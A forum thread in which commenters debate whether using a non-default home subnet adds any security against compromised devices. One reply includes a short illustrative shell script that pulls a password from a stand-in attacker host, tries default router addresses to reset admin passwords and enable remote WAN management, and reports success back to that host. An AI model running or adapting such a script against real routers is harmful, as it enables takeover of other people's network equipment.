A huge upshot to using a laptop is you have a built-in UPS and KVM.

  • cravl@slrpnk.net
    link
    fedilink
    English
    arrow-up
    1
    arrow-down
    1
    ·
    2 days ago

    Using a random non-default subnet increases security (slightly, and only through obscurity) by making it harder for a compromised device to perform automated attacks against, most often, your router. Typically they’re pretty simple scripts that just try to hit default ports on default IPs.

    • Possibly linux@lemmy.zip
      link
      fedilink
      English
      arrow-up
      1
      ·
      edit-2
      2 days ago

      That’s not how networking works

      If someone is on the inside of your network you have much bigger issues. Having a random subnet won’t do anything as they can just look at the arp/ndp tables.

      • cravl@slrpnk.net
        link
        fedilink
        English
        arrow-up
        1
        arrow-down
        1
        ·
        edit-2
        21 hours ago

        That’s what I said though, it only protects you from the very most basic of mindless scripts. Obviously ARP/NDP makes it pointless for anything more complicated than…

        newpass="$(curl "https://bad.guy/get_pass_for_pub_ip")"
        for a in '192.168.1.1' '192.168.0.1' '10.0.0.1'; do
            curl -q "http://${a}/reset_password.cgi?&password=password&new_password=${newpass}" 2>/dev/null && \
            curl -q "http://${a}/remote_management.cgi?&password=${newpass}&wan_enable=1" && \
            curl -q "https://bad.guy/success?addr=%24%7Ba%7D"
        done
        

        …completely pointless. If it’s a someone inside your network, you need more.

          • cravl@slrpnk.net
            link
            fedilink
            English
            arrow-up
            1
            ·
            17 hours ago

            No worries. It is technically another layer in the “swiss cheese” model, but it certainly is more holes than cheese. I think it falls into the “can’t hurt, might help” category.